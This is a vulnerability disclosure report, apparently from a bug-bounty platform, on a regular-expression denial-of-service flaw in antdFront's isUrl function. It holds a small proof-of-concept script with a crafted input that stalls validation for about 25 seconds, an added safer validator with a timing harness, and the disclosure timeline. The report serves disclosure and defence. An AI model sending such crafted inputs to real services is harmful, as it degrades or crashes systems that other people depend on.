Inefficient Regular Expression Complexity in x-neuron/antdfront

Valid

Reported on

Sep 2nd 2021


✍️ Description

A ReDoS (regular expression denial of service) flaw was found in the antdFront package. An attacker who is able to supply crafted input to the isUrl(input) function can cause the application to consume an excessive amount of CPU while the regular expression backtracks.

🕵️‍♂️ Proof of Concept

Create the following file, poc.mjs:

// poc.mjs
// Import the vulnerable validator from the cloned repository.
import { isUrl } from './antdFront/src/utils/is.js';

// Measure how long a single call takes on a crafted input.
var time = Date.now();
isUrl('http://foobar.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.');
var time_cost = Date.now() - time;
console.log("Time taken to validate : " + time_cost + " ms");

Execute the following commands in another terminal:

git clone the repository and make changes such as setting "type": "module" in its package.json
node poc.mjs

Check the output:

Time taken to validate : 25051 ms

💥 Impact

This vulnerability can exhaust system resources and lead to crashes. Ideally, validation should complete within 1-10 milliseconds, but in the case above it takes 25 seconds.
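The report does not show the affected regular expression, so the following is an added example, not antdFront's code: a replacement URL check that cannot backtrack, because it relies on the WHATWG URL parser (linear in the input length) plus an explicit length cap, together with a small timing harness of the same shape as the PoC. MAX_URL_LENGTH, isUrlSafe, timeValidation and the constructed POC_LIKE_INPUT are all assumptions introduced here.

```javascript
// Added example, not part of the antdFront project.
// A URL validator with bounded cost: no regular expression, so no catastrophic
// backtracking, and an upfront length cap so oversized input is rejected first.
const MAX_URL_LENGTH = 2048; // assumed cap; tune to what the application needs

function isUrlSafe(input) {
  if (typeof input !== 'string' || input.length > MAX_URL_LENGTH) {
    return false;
  }
  let parsed;
  try {
    parsed = new URL(input); // WHATWG parser: linear-time, throws on malformed input
  } catch (e) {
    return false;
  }
  // Only accept http(s) with a non-empty host, mirroring what an "is this a URL" helper usually wants.
  return (parsed.protocol === 'http:' || parsed.protocol === 'https:') &&
    parsed.hostname.length > 0;
}

// Timing harness in the same spirit as the PoC: returns the verdict and the
// elapsed wall-clock time so a test can assert the check stays fast.
function timeValidation(input) {
  const start = process.hrtime.bigint();
  const result = isUrlSafe(input);
  const elapsedMs = Number(process.hrtime.bigint() - start) / 1e6;
  return { result, elapsedMs };
}

// Constructed input shaped like the report's PoC string (many ".00" labels).
const POC_LIKE_INPUT = 'http://foobar.' + '00.'.repeat(40);

// Stand-alone demonstration.
const demo = timeValidation(POC_LIKE_INPUT);
console.log('isUrlSafe(POC-like input) =', demo.result,
  '| time taken to validate:', demo.elapsedMs.toFixed(3), 'ms');
console.log('isUrlSafe("https://example.com/path?q=1") =',
  isUrlSafe('https://example.com/path?q=1'));
```

The useful property here is not the exact verdict on the PoC string but that the verdict arrives in a bounded, input-proportional time; a regression test that asserts an upper bound on elapsedMs for adversarial inputs catches a reintroduced backtracking regex before it ships.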

We created a GitHub Issue asking the maintainers to create a SECURITY.md 9 months ago
ready-research submitted a
9 months ago
We have contacted a member of the x-neuron/antdfront team and are waiting to hear back 7 months ago
We have sent a second follow up to the x-neuron/antdfront team. We will try again in 10 days. 7 months ago
We have sent a third and final follow up to the x-neuron/antdfront team. This report is now considered stale. 7 months ago
50岁的星空 validated this vulnerability 12 days ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
50岁的星空 confirmed that a fix has been merged on ab135d 12 days ago
ready-research has been awarded the fix bounty